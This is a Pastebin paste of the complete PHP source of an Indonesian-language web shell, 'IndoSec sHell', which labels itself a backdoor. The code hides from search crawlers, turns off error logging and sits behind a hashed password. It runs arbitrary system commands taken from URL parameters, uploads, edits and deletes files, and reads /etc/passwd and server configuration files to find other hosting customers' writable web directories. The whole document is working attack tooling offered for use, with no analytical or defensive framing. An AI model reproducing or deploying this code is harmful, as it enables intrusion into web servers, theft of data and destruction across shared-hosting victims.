API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 2nd, 2019
152
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.51 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. Konsep Shell : Str0ng3 And Brillyan -Founder{ IndoSec }-
  4. Pembuat : Holiq -Member { IndoSec }-
  5. Re-Code Boleh Asal Dah Izin Sama Pembuata, Ganti Author & Re-Code Tanpa Seizin Pembuata... Fix Lo Noob Anjenk, Jangan Cuma Bisa Ganti Author Doank Bangsad
  6.  
  7. Thanks For All Member { IndoSec }, Yang Telah Membantu Proses Pembuatan Shell, Dan Dari Shell Lain Untuk Inspirasinya
  8.  
  9. { IndoSec sHell } v1
  10. Untuk Tools Yang Lain Akan Ditambahkan DiVersi Berikutnya
  11. ©2019 { IndoSec } -Holiq-
  12. */
  13. session_start();
  14. error_reporting(0);
  15. set_time_limit(0);
  16. @clearstatcache();
  17. @ini_set('error_log',NULL);
  18. @ini_set('log_errors',0);
  19. @ini_set('max_execution_time',0);
  20. @ini_set('output_buffering',0);
  21. @ini_set('display_errors', 0);
  22.  
  23. $auth_pass = "9ce3b2f378b10d8191107583f7127fbd"; // { IndoSec }
  24. $color = "#00ff00";
  25. $default_action = 'FilesMan';
  26. $default_use_ajax = true;
  27. $default_charset = 'UTF-8';
  28. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  29. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  30. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  31. header('HTTP/1.0 404 Not Found');
  32. exit;
  33. }
  34. }
  35.  
  36. function login_shell() {
  37. ?>
  38. <!DOCTYPE html>
  39. <html>
  40. <title>{ IndoSec sHell }</title>
  41. <head>
  42. <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
  43. <meta name="author" content="Holiq"/>
  44. <meta name="copyright" content="{ IndoSec }"/>
  45. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
  46. <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous"/>
  47. </head>
  48. <body class="bg-dark text-light">
  49. <center>
  50. <br/><h3>{ IndoSec Shell }</h3><hr/><br/>
  51. <div class="container">
  52. <div class="col-lg-6">
  53. <div class="form-group">
  54. <h5><i class="fa fa-sign-in-alt"></i> { login }</h5>
  55. <br/>
  56. <form method="post">
  57. <input type="password" name="pass" placeholder="Id User.." class="form-control"><br/>
  58. <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login">
  59. </form>
  60. </div>
  61. </div><br/><p style="opacity: 0.3;"><a href="https://facebook.com/IndoSecOfficial" style="color: white;">Copyright 2019 { IndoSec }</a></p><br/>
  62. </div>
  63. </center>
  64. </body>
  65. </html>
  66. <?php
  67. exit;
  68. }
  69. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  70. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  71. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  72. else
  73. login_shell();
  74. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  75. @ob_clean();
  76. $file = $_GET['file'];
  77. header('Content-Description: File Transfer');
  78. header('Content-Type: application/octet-stream');
  79. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  80. header('Expires: 0');
  81. header('Cache-Control: must-revalidate');
  82. header('Pragma: public');
  83. header('Content-Length: ' . filesize($file));
  84. readfile($file);
  85. exit;
  86. }
  87. ?>
  88. <?php
  89. function w($dir,$perm) {
  90. if(!is_writable($dir)) {
  91. return "<font color=red>".$perm."</font>";
  92. } else {
  93. return "<font color=lime>".$perm."</font>";
  94. }
  95. }
  96. function r($dir,$perm) {
  97. if(!is_readable($dir)) {
  98. return "<font color=red>".$perm."</font>";
  99. } else {
  100. return "<font color=lime>".$perm."</font>";
  101. }
  102. }
  103.  
  104. function exe($cmd) {
  105. if(function_exists('system')) {
  106. @ob_start();
  107. @system($cmd);
  108. $buff = @ob_get_contents();
  109. @ob_end_clean();
  110. return $buff;
  111. } elseif(function_exists('exec')) {
  112. @exec($cmd,$results);
  113. $buff = "";
  114. foreach($results as $result) {
  115. $buff .= $result;
  116. } return $buff;
  117. } elseif(function_exists('passthru')) {
  118. @ob_start();
  119. @passthru($cmd);
  120. $buff = @ob_get_contents();
  121. @ob_end_clean();
  122. return $buff;
  123. } elseif(function_exists('shell_exec')) {
  124. $buff = @shell_exec($cmd);
  125. return $buff;
  126. }
  127. }
  128.  
  129. function perms($file){
  130. $perms = fileperms($file);
  131.  
  132. if (($perms & 0xC000) == 0xC000) {
  133. // Socket
  134. $info = 's';
  135. } elseif (($perms & 0xA000) == 0xA000) {
  136. // Symbolic Link
  137. $info = 'l';
  138. } elseif (($perms & 0x8000) == 0x8000) {
  139. // Regular
  140. $info = '-';
  141. } elseif (($perms & 0x6000) == 0x6000) {
  142. // Block special
  143. $info = 'b';
  144. } elseif (($perms & 0x4000) == 0x4000) {
  145. // Directory
  146. $info = 'd';
  147. } elseif (($perms & 0x2000) == 0x2000) {
  148. // Character special
  149. $info = 'c';
  150. } elseif (($perms & 0x1000) == 0x1000) {
  151. // FIFO pipe
  152. $info = 'p';
  153. } else {
  154. // Unknown
  155. $info = 'u';
  156. }
  157.  
  158. // Owner
  159. $info .= (($perms & 0x0100) ? 'r' : '-');
  160. $info .= (($perms & 0x0080) ? 'w' : '-');
  161. $info .= (($perms & 0x0040) ?
  162. (($perms & 0x0800) ? 's' : 'x' ) :
  163. (($perms & 0x0800) ? 'S' : '-'));
  164. // Group
  165. $info .= (($perms & 0x0020) ? 'r' : '-');
  166. $info .= (($perms & 0x0010) ? 'w' : '-');
  167. $info .= (($perms & 0x0008) ?
  168. (($perms & 0x0400) ? 's' : 'x' ) :
  169. (($perms & 0x0400) ? 'S' : '-'));
  170.  
  171. // World
  172. $info .= (($perms & 0x0004) ? 'r' : '-');
  173. $info .= (($perms & 0x0002) ? 'w' : '-');
  174. $info .= (($perms & 0x0001) ?
  175. (($perms & 0x0200) ? 't' : 'x' ) :
  176. (($perms & 0x0200) ? 'T' : '-'));
  177.  
  178. return $info;
  179. }
  180.  
  181.  
  182. if(isset($_GET['path'])){
  183. $path = $_GET['path'];
  184. chdir($path);
  185. }else{
  186. $path = getcwd();
  187. }
  188. $path = str_replace('\\','/',$path);
  189. $paths = explode('/',$path);
  190. if(isset($_GET['dir'])) {
  191. $dir = $_GET['dir'];
  192. chdir($dir);
  193. } else {
  194. $dir = getcwd();
  195. }
  196. $os = php_uname();
  197. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  198. $ver = phpversion();
  199. $dom = $_SERVER['HTTP_HOST'];
  200. $dir = str_replace("\\","/",$dir);
  201. $scdir = explode("/", $dir);
  202. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  203. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  204.  
  205. echo "
  206. <html>
  207. <title>{ Simpel sHell }</title>
  208. <head>
  209. <meta name='viewport' content='widht=device-widht, initial-scale=1'>
  210. <link rel='stylesheet' href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css'>
  211. <link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.7.1/css/all.css' integrity='sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr' crossorigin='anonymous'>
  212. <link rel='stylesheet' href='https://code.jquery.com/jquery-3.3.1.js'>
  213. </head>
  214. <body class='bg-dark text-light'>
  215. <style>
  216. #tab tr:hover{
  217. background-color: #5B6F7D;
  218. }
  219. </style>
  220. <div class='container'>
  221. <h1 style='text-align:center'>{ IndoSec }</h1>
  222. <center><h5>sHell Backdoor</h5></center>
  223. <hr/>
  224. <center><div class='form-group'>
  225. <a href='?' class='btn btn-success btn-sm'><i class='fa fa-home'></i> Home</a>
  226. <a href='?keluar' class='btn btn-success btn-sm'><i class='fa fa-sign-out-alt'></i> keluar</a>
  227. </div>
  228. <div class='form-group'>
  229. <a href='?dir=$dir&aksi=buat_file' class='btn btn-danger btn-sm'><i class='fa fa-plus-circle'></i> Buat File</a>
  230. <a href='?dir=$dir&aksi=buat_folder' class='btn btn-danger btn-sm'><i class='fa fa-plus'></i> Buat Folder</a>
  231. </div>
  232. <div class='form-group'>
  233. <a href='?dir=$dir&aksi=upload' class='btn btn-success btn-sm'><i class='fa fa-upload'></i> Upload</a>
  234. <a href='?dir=$dir&aksi=jumping' class='btn btn-success btn-sm'><i class='fa fa-exclamation'></i> Jumping</a>
  235. </div></center>
  236.  
  237. <div class='row'>
  238. <div class='col-lg-4'><br />
  239. <h5><i class='fa fa-terminal'></i>Terminal : </h5>
  240. <form>
  241. <input type='text' class='form-control' name='cmd'>
  242. </form>
  243. <hr style='backgroud: white'/>
  244. <h5><i class='fa fa-search'></i> Informasi : </h5>
  245. <div class='card table-responsive'>
  246. <div class='card-body' style='color: #333'>
  247. <table class='table' style='color: #333'>
  248. <tr>
  249. <td>PHP Version</td>
  250. <td> : $ver</td>
  251. </tr>
  252. <tr>
  253. <td>IP Server</td>
  254. <td> : $ip</td>
  255. </tr>
  256. <tr>
  257. <td>Domain Web</td>
  258. <td> : $dom</td>
  259. </tr>
  260. <tr>
  261. <td>MySQL</td>
  262. <td>: $mysql</td>
  263. </tr>
  264. <tr>
  265. <td>CURL</td>
  266. <td>: $curl</td>
  267. </tr>
  268. <tr>
  269. <td>Sistem Operasi</td>
  270. <td> : $os</td>
  271. </tr>
  272. </table>
  273. </div>
  274. </div><br/>
  275. </div>
  276. </div>
  277. </div>
  278. </body>
  279. </html>
  280. <div class='col-lg-8'>";
  281.  
  282. if(isset($_GET['cmd'])){
  283. echo "<div class='card'><div class='container'><font color='black'>";
  284. echo "<pre>";
  285. echo system($_GET['cmd']);
  286. echo "</pre>";
  287. echo "</font></div></div>";
  288. }
  289.  
  290.  
  291. if (isset($_GET['keluar'])) {
  292. session_start(); session_destroy();
  293. header('location: ?');
  294. }
  295.  
  296. if(isset($_GET['path'])){
  297. $path = $_GET['path'];
  298. chdir($path);
  299. }else{
  300. $path = getcwd();
  301. }
  302. $path = str_replace('\\','/',$path);
  303. $paths = explode('/',$path);
  304.  
  305. foreach($paths as $id=>$pat){
  306. if($pat == '' && $id == 0){
  307. $a = true;
  308. echo '<a href="?dir=/">/</a>';
  309. continue;
  310. }
  311. if($pat == '') continue;
  312. echo '<a href="?dir=';
  313. for($i=0;$i<=$id;$i++){
  314. echo "$paths[$i]";
  315. if($i != $id) echo "/";
  316. }
  317. echo '">'.$pat.'</a>/';
  318. }
  319. $scandir = scandir($path);
  320. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  321. echo '<center><div id="tab"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  322. <thead class="bg-info">
  323. <th>File/Folder</th>
  324. <th>Size</th>
  325. <th>Perizinan</th>
  326. <th>Action</th>
  327. </thead>';
  328.  
  329. foreach($scandir as $dir){
  330. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  331. echo '<tr>
  332. <td><i class="fa fa-folder"></i> <a href="?dir='.$path.'/'.$dir.'">'.$dir.'</a></td>
  333. <td><center>--</center></td>
  334. <td><center>';
  335. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
  336. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  337. echo perms($path.'/'.$dir);
  338. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></center></td>
  339. <td><center><a href="?hapus_folder='.$path.'/'.$dir.'">Hapus</a> <a href="?rename='.$path.'/'.$dir.'">Rename</a></center></td>
  340. ';
  341.  
  342. echo '</tr>';
  343. }
  344.  
  345. echo '<tr><td></td></tr>';
  346.  
  347. foreach($scandir as $file){
  348. if(!is_file($path.'/'.$file)) continue;
  349. $size = filesize($path.'/'.$file)/1024;
  350. $size = round($size,3);
  351. if($size >= 1024){
  352. $size = round($size/1024,2).' MB';
  353. }else{
  354. $size = $size.' KB';
  355. }
  356.  
  357. echo '<tr>
  358. <td><i class="fa fa-file"></i> <font color="#007CFF">'.$file.'</td>
  359. <td><center>'.$size.'</center></td>
  360. <td><center>';
  361. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
  362. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  363. echo perms($path.'/'.$file);
  364. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>
  365. <td><center><a href="?aksi=view&dirf='.$path.'/'.$file.'">lihat</a> <a href="?aksi=edit&dirf='.$path.'/'.$file.'">edit</a> <a href="?aksi=hapusf&dirf='.$path.'/'.$file.'">Hapus</a></td>';
  366. echo '</center></td>
  367. </tr>';
  368. }
  369. echo '</table></center><hr/><p align="center" style="opacity: 0.3;"><a href="https://facebook.com/IndoSecOfficial" style="color: white;">Copyright 2019 { IndoSec }</a></p><br/>';
  370.  
  371. //upload
  372. if ($_GET['aksi'] == 'upload') {
  373. echo "<hr/><div class='card'><br /><form method='POST' enctype='multipart/form-data' name='uploader' id='uploader'>
  374. <font color='black'><input class='btn btn-danger btn-sm' type='file' name='file' size='50'> <input class='btn btn-info' type='submit' value='Upload'></font></div><hr/>";
  375.  
  376. if(isset($_FILES['file'])){
  377. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  378. echo '<script>window.location="?dir='.$path.'"; alert("Upload Berhasil");</script>';
  379. }else{
  380. echo 'Gagal Upload!!!</b><br><br>';
  381. }
  382. }
  383. }
  384. echo "</di>";
  385.  
  386.  
  387. //File.....
  388.  
  389. //openfile
  390. if (isset($_GET['dirf'])) {
  391. $file = $_GET['dirf'];
  392. }
  393.  
  394. //buat_file
  395. if ($_GET['aksi'] == 'buat_file') {
  396.  
  397. $output = "
  398. <h4><i class='fa fa-file'></i> Buat File: </h4>
  399. <form method='POST'>
  400. <input type='text' class='form-control' name='nama_file' placeholder='Nama File...'><br />
  401. <textarea name='isi_file' class='form-control' placeholder='Isi File...'></textarea><br />
  402. <button type='sumbit' class='btn btn-info btn-block' name='bikin'>Bikin!!</button>
  403. </form>
  404. ";
  405. echo $output;
  406. }
  407.  
  408. if (isset($_POST['bikin'])) {
  409. $nama_file = $_POST['nama_file'];
  410. $isi_file = $_POST['isi_file'];
  411. $handle = fopen("$nama_file", "w");
  412. if (fwrite($handle, $isi_file)) {
  413. echo '<script>window.location="?dir='.$path.'"; alert("Buat File Berhasil");</script>';
  414. }else{
  415. echo 'File Gagal Dibuat';
  416. }
  417. }
  418.  
  419. //view
  420. if($_GET['aksi'] == 'view') {
  421. echo '[ <a href="?aksi=view&dirf='.$file.'">lihat</a> ] [ <a href="?aksi=edit&dirf='.$file.'">Edit</a> ] [ <a href="?aksi=hapusf&dirf='.$path.'/'.$file.'">Hapus</a> ]';
  422. echo "
  423. <textarea rows='10' class='form-control' disabled=''>".htmlspecialchars(file_get_contents($file))."</textarea>
  424. <br /><br />";
  425. }
  426.  
  427.  
  428.  
  429. //edit
  430. if($_GET['aksi'] == 'edit') {
  431. echo '[ <a href="?aksi=view&dirf='.$file.'">lihat</a> ] [ <a href="?aksi=edit&dirf='.$file.'">Edit</a> ] [ <a href="?aksi=hapusf&dirf='.$path.'/'.$file.'">Hapus</a> ]';
  432. echo "<h5><i class='fa fa-file'></i> Rename File : </h5>
  433. <form method='POST'>
  434. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br />
  435. <h5><i class='fa fa-file'></i> Edit File...</h5>
  436. <textarea rows='10' class='form-control' name='isi'>".htmlspecialchars(file_get_contents($file))."</textarea>
  437. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>
  438. </form><br/>";
  439. }
  440.  
  441. if(isset($_POST['edit_file'])) {
  442. $updt = fopen("$file", "w");
  443. $hasil = fwrite($updt, $_POST['isi']);
  444.  
  445. if ($hasil) {
  446. echo 'Berhasil Update!!';
  447. }else{
  448. echo 'Gagal Update!!';
  449. }
  450. echo "<br/><br/>";
  451.  
  452. $lama = $file;
  453. $baru = $_POST['namanew'];
  454. rename( $baru, $lama);
  455. if(file_exists($baru)) {
  456. echo "Nama $baru Telah Digunakan";
  457. }else{
  458. if(rename( $lama, $baru)) {
  459. echo "Sukses Mengganti Nama Menjadi $baru";
  460. }else{
  461. echo "Gagal Mengganti Nama";
  462. }
  463. }echo "<br/><br/>";
  464. }
  465.  
  466.  
  467.  
  468.  
  469. //hapus_file
  470. if ($_GET['aksi'] == 'hapusf') {
  471. echo '[ <a href="?aksi=view&dirf='.$file.'">lihat</a> ] [ <a href="?aksi=edit&dirf='.$file.'">Edit</a> ] [ <a href="?aksi=hapusf&dirf='.$path.'/'.$file.'">Hapus</a> ]';
  472. $output ="
  473. <div class='card container'>
  474. <center><br/>
  475. <font color='black'>Yakin Menghapus : $file
  476. </center><br/><br/>
  477. <form method='POST'>
  478. <a class='btn btn-danger' href='?'>Tidak</a>
  479. <input type='submit' name='ya' class='float-right btn btn-success' value=' Ya '>
  480. </form><br/><br/>
  481. ";
  482. echo $output;
  483.  
  484. if ($_POST['ya']) {
  485. $hapus = unlink($file);
  486. if ($hapus) {
  487. echo '<script>window.location="?dir='.$path.'"; alert("Berhasil Menghapus File");</script>';
  488. }else{
  489. echo "Gagal Menghapus File!!<br/><br/></font>";
  490. }
  491. }
  492. echo "</div><br/><br/>";
  493. }
  494. /*
  495. ////////////////////////////////////////////////////////////////////////////////
  496. \\\\\\\\\\\\\\\\\\\\\\\\\\©2019 Holiq { IndoSec }\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  497. ////////////////////////////////////////////////////////////////////////////////
  498. */
  499.  
  500. //folder
  501.  
  502. //buat_folder
  503. if ($_GET['aksi'] == 'buat_folder' ) {
  504. $output = "
  505. <h4><i class='fa fa-folder'></i> Buat Folder: </h4>
  506. <form method='POST'>
  507. <input type='text' class='form-control' name='nama_folder' placeholder='Nama Folder...'><br />
  508. <button type='sumbit' class='btn btn-info btn-block' name='buat'>Buat!!</button><br/>
  509. </form>
  510. ";
  511. echo $output;
  512. }
  513.  
  514. if (isset($_POST['buat'])) {
  515. $nama_folder = $_POST['nama_folder'];
  516. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST["nama_folder"]);
  517. $fd = mkdir ($folder);
  518. if ($fd) {
  519. echo '<script>window.location="?dir='.$path.'"; alert("Berhasil Membuat Folder");</script>';
  520. }else{
  521. echo "Folder ".$folder." Gagal Dibuat!!";
  522. }
  523. }
  524.  
  525.  
  526.  
  527. //hapus_folder
  528. if (isset($_GET['hapus_folder'])) {
  529. $dir = $_GET['hapus_folder'];
  530.  
  531. $output ="
  532. [ <a href='?hapus_folder=".$path."/".$dir."'>Hapus</a> ] [ <a href='?rename=".$path."/".$dir."'>Rename</a> ]
  533. <div class='card container'>
  534. <center><br/>
  535. <font color='black'>Apakah Yakin Menghapus : $dir
  536. </center><br/><br/>
  537. <form method='POST'>
  538. <a class='btn btn-danger' href='?'>Tidak</a>
  539. <input type='submit' name='ya' class='float-right btn btn-success' value=' Ya '>
  540. </form><br/><br/>
  541. ";
  542. echo $output;
  543.  
  544. if ($_POST['ya']) {
  545. if(is_dir($dir)) {
  546. if(is_writable($dir)) {
  547. @rmdir($dir);
  548. @exe("rm -rf $dir");
  549. @exe("rmdir /s /q $dir");
  550. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Menghapus Folder');</script>";
  551. } else {
  552. echo "<font color=red>could not remove ".basename($dir)."</font>";
  553. }
  554. }
  555. }
  556. }
  557.  
  558.  
  559. //rename
  560. if (isset($_GET['rename'])) {
  561. $dir = $_GET['rename'];
  562. $output="
  563. [ <a href='?hapus_folder=".$path."/".$dir."'>Hapus</a> ] [ <a href='?rename=".$path."/".$dir."'>Rename</a> ]
  564. <h4><i class='fa fa-folder'></i> Rename Folder :</h4>
  565. <form method='POST'>
  566. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br />
  567. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button>
  568. ";
  569. echo $output;
  570. }
  571.  
  572. if (isset($_POST['ganti'])) {
  573. $lama = $dir;
  574. $baru = $_POST['namanew'];
  575. $ubah = rename($lama, $baru);
  576. if($ubah) {
  577. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Mengganti Nama');</script>";
  578. }else{
  579. echo "Gagal Mengganti Nama<br/><br/>" ;
  580. }
  581. }
  582.  
  583.  
  584. /*
  585. ////////////////////////////////////////////////////////////////////////////////
  586. \\\\\\\\\\\\\\\\\\\\\\\\\\©2019 Holiq { IndoSec }\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  587. ////////////////////////////////////////////////////////////////////////////////
  588. */
  589.  
  590. //Fungsi_Tambahan
  591. if($_GET['aksi'] == 'jumping') {
  592. $i = 0;
  593. echo "<div class='card container'>";
  594. if(preg_match("/hsphere/", $dir)) {
  595. $urls = explode("\r\n", $_POST['url']);
  596. if(isset($_POST['jump'])) {
  597. echo "<pre>";
  598. foreach($urls as $url) {
  599. $url = str_replace(array("http://","www."), "", strtolower($url));
  600. $etc = "/etc/passwd";
  601. $f = fopen($etc,"r");
  602. while($gets = fgets($f)) {
  603. $pecah = explode(":", $gets);
  604. $user = $pecah[0];
  605. $dir_user = "/hsphere/local/home/$user";
  606. if(is_dir($dir_user) === true) {
  607. $url_user = $dir_user."/".$url;
  608. if(is_readable($url_user)) {
  609. $i++;
  610. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  611. if(is_writable($url_user)) {
  612. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  613. }
  614. echo $jrw."<br>";
  615. }
  616. }
  617. }
  618. }
  619. if($i == 0) {
  620. } else {
  621. echo "<br>Total ada ".$i." Kamar di ".$ip;
  622. }
  623. echo "</pre>";
  624. } else {
  625. echo '<center>
  626. <form method="post">
  627. List Domains: <br>
  628. <textarea name="url" style="width: 500px; height: 250px;">';
  629. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  630. while($getss = fgets($fp)) {
  631. echo $getss;
  632. }
  633. echo '</textarea><br>
  634. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  635. </form></center>';
  636. }
  637. } elseif(preg_match("/vhosts/", $dir)) {
  638. $urls = explode("\r\n", $_POST['url']);
  639. if(isset($_POST['jump'])) {
  640. echo "<pre>";
  641. foreach($urls as $url) {
  642. $web_vh = "/var/www/vhosts/$url/httpdocs";
  643. if(is_dir($web_vh) === true) {
  644. if(is_readable($web_vh)) {
  645. $i++;
  646. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  647. if(is_writable($web_vh)) {
  648. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  649. }
  650. echo $jrw."<br>";
  651. }
  652. }
  653. }
  654. if($i == 0) {
  655. } else {
  656. echo "<br>Total ada ".$i." Kamar di ".$ip;
  657. }
  658. echo "</pre>";
  659. } else {
  660. echo '<center>
  661. <form method="post">
  662. List Domains: <br>
  663. <textarea name="url" style="width: 500px; height: 250px;">';
  664. bing("ip:$ip");
  665. echo '</textarea><br>
  666. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  667.  
  668. </form></center>';
  669. }
  670. } else {
  671. echo "<pre>";
  672. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  673. while($passwd = fgets($etc)) {
  674. if($passwd == '' || !$etc) {
  675. echo "<font color=red>Can't read /etc/passwd</font>";
  676. } else {
  677. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  678. foreach($user_jumping[1] as $user_pro_jump) {
  679. $user_jumping_dir = "/home/$user_pro_jump/public_html";
  680. if(is_readable($user_jumping_dir)) {
  681. $i++;
  682. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  683. if(is_writable($user_jumping_dir)) {
  684. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  685. }
  686. echo $jrw;
  687. if(function_exists('posix_getpwuid')) {
  688. $domain_jump = file_get_contents("/etc/named.conf");
  689. if($domain_jump == '') {
  690. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  691. } else {
  692. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  693. foreach($domains_jump[1] as $dj) {
  694. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  695. $user_jumping_url = $user_jumping_url['name'];
  696. if($user_jumping_url == $user_pro_jump) {
  697. echo " => ( <u>$dj</u> )<br>";
  698. break;
  699. }
  700. }
  701. }
  702. } else {
  703. echo "<br>";
  704. }
  705. }
  706. }
  707. }
  708. }
  709. if($i == 0) {
  710. } else {
  711. echo "<br>Total ada ".$i." Kamar di ".$ip;
  712. }
  713. echo "</pre>";
  714. }
  715. echo "</div>";
  716. }
  717.  
  718. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!